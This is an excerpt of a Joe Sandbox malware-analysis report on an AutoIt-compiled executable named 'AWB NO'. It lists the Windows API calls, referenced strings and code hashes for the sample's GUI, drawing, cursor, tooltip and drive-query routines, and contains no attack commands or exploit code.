                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                              • Instruction ID: 17309c0469a5bd52ad7e8dbf9c3f61d171e4b81c5cab4c8a7a82cd1e78734ebc
                                                              • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                              • Instruction Fuzzy Hash: 00615CB2E046268BDF28CF1DC89016AFBF6AF89300B19C1AADC59DF315D674D941CB94
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 00477B70
                                                              • DeleteObject.GDI32(00000000), ref: 00477B82
                                                              • DestroyWindow.USER32 ref: 00477B90
                                                              • GetDesktopWindow.USER32 ref: 00477BAA
                                                              • GetWindowRect.USER32(00000000), ref: 00477BB1
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00477CF2
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00477D02
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477D4A
                                                              • GetClientRect.USER32(00000000,?), ref: 00477D56
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00477D90
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DB2
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DC5
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DD0
                                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DD9
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DE8
                                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DF1
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477DF8
                                                              • GlobalFree.KERNEL32(00000000), ref: 00477E03
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477E15
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00492CAC,00000000), ref: 00477E2B
                                                              • GlobalFree.KERNEL32(00000000), ref: 00477E3B
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00477E61
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00477E80
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00477EA2
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0047808F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,0048F910), ref: 004838AF
                                                              • IsWindowVisible.USER32(?), ref: 004838D3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 0048A89F
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048A8D0
                                                              • GetSysColor.USER32(0000000F), ref: 0048A8DC
                                                              • SetBkColor.GDI32(?,000000FF), ref: 0048A8F6
                                                              • SelectObject.GDI32(?,?), ref: 0048A905
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A930
                                                              • GetSysColor.USER32(00000010), ref: 0048A938
                                                              • CreateSolidBrush.GDI32(00000000), ref: 0048A93F
                                                              • FrameRect.USER32(?,?,00000000), ref: 0048A94E
                                                              • DeleteObject.GDI32(00000000), ref: 0048A955
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0048A9A0
                                                              • FillRect.USER32(?,?,?), ref: 0048A9D2
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048A9FD
                                                                • Part of subcall function 0048AB60: GetSysColor.USER32(00000012), ref: 0048AB99
                                                                • Part of subcall function 0048AB60: SetTextColor.GDI32(?,?), ref: 0048AB9D
                                                                • Part of subcall function 0048AB60: GetSysColorBrush.USER32(0000000F), ref: 0048ABB3
                                                                • Part of subcall function 0048AB60: GetSysColor.USER32(0000000F), ref: 0048ABBE
                                                                • Part of subcall function 0048AB60: GetSysColor.USER32(00000011), ref: 0048ABDB
                                                                • Part of subcall function 0048AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048ABE9
                                                                • Part of subcall function 0048AB60: SelectObject.GDI32(?,00000000), ref: 0048ABFA
                                                                • Part of subcall function 0048AB60: SetBkColor.GDI32(?,00000000), ref: 0048AC03
                                                                • Part of subcall function 0048AB60: SelectObject.GDI32(?,?), ref: 0048AC10
                                                                • Part of subcall function 0048AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0048AC2F
                                                                • Part of subcall function 0048AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048AC46
                                                                • Part of subcall function 0048AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0048AC5B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                              APIs
                                                              • DestroyWindow.USER32(?,?,?), ref: 00402CA2
                                                              • DeleteObject.GDI32(00000000), ref: 00402CE8
                                                              • DeleteObject.GDI32(00000000), ref: 00402CF3
                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C68B
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C6C4
                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043CAED
                                                                • Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A
                                                              • SendMessageW.USER32(?,00001053), ref: 0043CB2A
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043CB41
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043CB57
                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043CB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              APIs
                                                              • DestroyWindow.USER32(00000000), ref: 004777F1
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004778B0
                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004778EE
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00477900
                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477946
                                                              • GetClientRect.USER32(00000000,?), ref: 00477952
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477996
                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004779A5
                                                              • GetStockObject.GDI32(00000011), ref: 004779B5
                                                              • SelectObject.GDI32(00000000,00000000), ref: 004779B9
                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004779C9
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004779D2
                                                              • DeleteDC.GDI32(00000000), ref: 004779DB
                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00477A07
                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00477A1E
                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477A59
                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00477A6D
                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00477A7E
                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00477AAE
                                                              • GetStockObject.GDI32(00000011), ref: 00477AB9
                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00477AC4
                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00477ACE
                                                              Similarity
                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046AF89
                                                              • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046B066
                                                              • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046B1C4
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 0048AB99
                                                              • SetTextColor.GDI32(?,?), ref: 0048AB9D
                                                              • GetSysColorBrush.USER32(0000000F), ref: 0048ABB3
                                                              • GetSysColor.USER32(0000000F), ref: 0048ABBE
                                                              • CreateSolidBrush.GDI32(?), ref: 0048ABC3
                                                              • GetSysColor.USER32(00000011), ref: 0048ABDB
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048ABE9
                                                              • SelectObject.GDI32(?,00000000), ref: 0048ABFA
                                                              • SetBkColor.GDI32(?,00000000), ref: 0048AC03
                                                              • SelectObject.GDI32(?,?), ref: 0048AC10
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0048AC2F
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048AC46
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0048AC5B
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048ACA7
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048ACCE
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0048ACEC
                                                              • DrawFocusRect.USER32(?,?), ref: 0048ACF7
                                                              • GetSysColor.USER32(00000011), ref: 0048AD05
                                                              • SetTextColor.GDI32(?,00000000), ref: 0048AD0D
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AD21
                                                              • SelectObject.GDI32(?,0048A869), ref: 0048AD38
                                                              • DeleteObject.GDI32(?), ref: 0048AD43
                                                              • SelectObject.GDI32(?,?), ref: 0048AD49
                                                              • DeleteObject.GDI32(?), ref: 0048AD4E
                                                              • SetTextColor.GDI32(?,?), ref: 0048AD54
                                                              • SetBkColor.GDI32(?,?), ref: 0048AD5E
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00484C51
                                                              • GetDesktopWindow.USER32 ref: 00484C66
                                                              • GetWindowRect.USER32(00000000), ref: 00484C6D
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00484CCF
                                                              • DestroyWindow.USER32(?), ref: 00484CFB
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484D24
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484D42
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484D68
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00484D7D
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484D90
                                                              • IsWindowVisible.USER32(?), ref: 00484DB0
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484DCB
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484DDF
                                                              • GetWindowRect.USER32(?,?), ref: 00484DF7
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00484E1D
                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00484E37
                                                              • CopyRect.USER32(?,?), ref: 00484E4E
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00484EB9
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488D34
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488D45
                                                              • CharNextW.USER32(0000014E), ref: 00488D74
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488DB5
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488DCB
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488DDC
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488DF9
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00488E45
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488E5B
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488E8C
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488EFA
                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488F83
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488FDB
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00489088
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004890AA
                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004890F4
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00489121
                                                              • DrawMenuBar.USER32(?), ref: 00489130
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00489158
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                                                              • GetSystemMetrics.USER32(00000007), ref: 004028C4
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                                                              • GetSystemMetrics.USER32(00000008), ref: 004028F7
                                                              • GetSystemMetrics.USER32(00000004), ref: 0040291C
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                                                              • GetStockObject.GDI32(00000011), ref: 004029CA
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                                                                • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                                                                • Part of subcall function 00402344: ScreenToClient.USER32(004C67B0,?), ref: 00402374
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                              • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 004840F6
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004841B6
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00475309
                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00475314
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0047531F
                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 0047532A
                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00475335
                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00475340
                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 0047534B
                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00475356
                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00475361
                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 0047536C
                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00475377
                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00475382
                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 0047538D
                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00475398
                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 004753A3
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 004753AE
                                                              • GetCursorInfo.USER32(?), ref: 004753BE
                                                              • GetLastError.KERNEL32(00000001,00000000), ref: 004753E9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Cursor$Load$ErrorInfoLast
                                                              • String ID:
                                                              • API String ID: 3215588206-0
                                                              • Opcode ID: 6a6270ed0b4940824aeabb991483fe1258c9c8061cdaf7958afd48eb47f7a711
                                                              • Instruction ID: 895aef13bd3dab5c61d690930f62dfa726266ed77347b80580808b7c2f00316e
                                                              • Opcode Fuzzy Hash: 6a6270ed0b4940824aeabb991483fe1258c9c8061cdaf7958afd48eb47f7a711
                                                              • Instruction Fuzzy Hash: 64415370E043196ADB109FBA8C499AFFFF8EF51B50B10453FA509EB291DAB894018E55
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 0045C4D4
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045C4E6
                                                              • SetWindowTextW.USER32(?,?), ref: 0045C4FD
                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045C512
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045C518
                                                              • GetDlgItem.USER32(?,000003E9), ref: 0045C528
                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045C52E
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0045C54F
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0045C569
                                                              • GetWindowRect.USER32(?,?), ref: 0045C572
                                                              • SetWindowTextW.USER32(?,?), ref: 0045C5DD
                                                              • GetDesktopWindow.USER32 ref: 0045C5E3
                                                              • GetWindowRect.USER32(00000000), ref: 0045C5EA
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0045C636
                                                              • GetClientRect.USER32(?,?), ref: 0045C643
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0045C668
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0045C693
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                              • String ID:
                                                              • API String ID: 3869813825-0
                                                              • Opcode ID: e87f013716cb66209e1fdc9be48e700506287b43d24e7040997972545f066d81
                                                              • Instruction ID: 3b2bd1e7a7ebd211801f78b3086a02ec173cefa662ab0dc5f88ee9ae4e850772
                                                              • Opcode Fuzzy Hash: e87f013716cb66209e1fdc9be48e700506287b43d24e7040997972545f066d81
                                                              • Instruction Fuzzy Hash: 1F518070900709AFDB20DFA8CD85B6FBBF5FF04705F00492DE682A26A1D774A949CB54
                                                              APIs
                                                                • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                              • DragQueryPoint.SHELL32(?,?), ref: 0048C917
                                                                • Part of subcall function 0048ADF1: ClientToScreen.USER32(?,?), ref: 0048AE1A
                                                                • Part of subcall function 0048ADF1: GetWindowRect.USER32(?,?), ref: 0048AE90
                                                                • Part of subcall function 0048ADF1: PtInRect.USER32(?,?,0048C304), ref: 0048AEA0
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C980
                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C98B
                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C9AE
                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C9F5
                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0048CA0E
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048CA25
                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0048CA47
                                                              • DragFinish.SHELL32(?), ref: 0048CA4E
                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048CB41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prL
                                                              • API String ID: 221274066-2894286323
                                                              • Opcode ID: d0e734f8bc4af10141359df723f003250e68afa15a89e3e1243172bffb465fbe
                                                              • Instruction ID: 9d54b60ae23129ec17e3264f3c4c669362dbaaf1ee08fbcc713ae4d442fb7e93
                                                              • Opcode Fuzzy Hash: d0e734f8bc4af10141359df723f003250e68afa15a89e3e1243172bffb465fbe
                                                              • Instruction Fuzzy Hash: B6617F71108301AFC701EF65DC85D9FBBF8EF88714F500A2EF591A21A1DB749A49CB6A
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 004846AB
                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004846F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                              • API String ID: 3974292440-4258414348
                                                              • Opcode ID: a101b73c2f75f03c977d0f9bd74546b52b8b14f2b6a66f94324df33cf61ca14b
                                                              • Instruction ID: a6b8fb82e4ceb85ef300ce259a46dfdb45366ccd12162413b511f73bb29c4b6b
                                                              • Opcode Fuzzy Hash: a101b73c2f75f03c977d0f9bd74546b52b8b14f2b6a66f94324df33cf61ca14b
                                                              • Instruction Fuzzy Hash: 5E9152742143129FCB14FF15C451A6EB7A1AF84318F00486EE8956B793DB3CED4ACB9A
                                                              APIs
                                                              • DestroyWindow.USER32(?,?), ref: 0048A542
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A5BC
                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A5DE
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A5F1
                                                              • DestroyWindow.USER32(00000000), ref: 0048A613
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A64A
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A663
                                                              • GetDesktopWindow.USER32 ref: 0048A67C
                                                              • GetWindowRect.USER32(00000000), ref: 0048A683
                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A69B
                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A6B3
                                                                • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                              Strings
                                                              Memory Dump Source
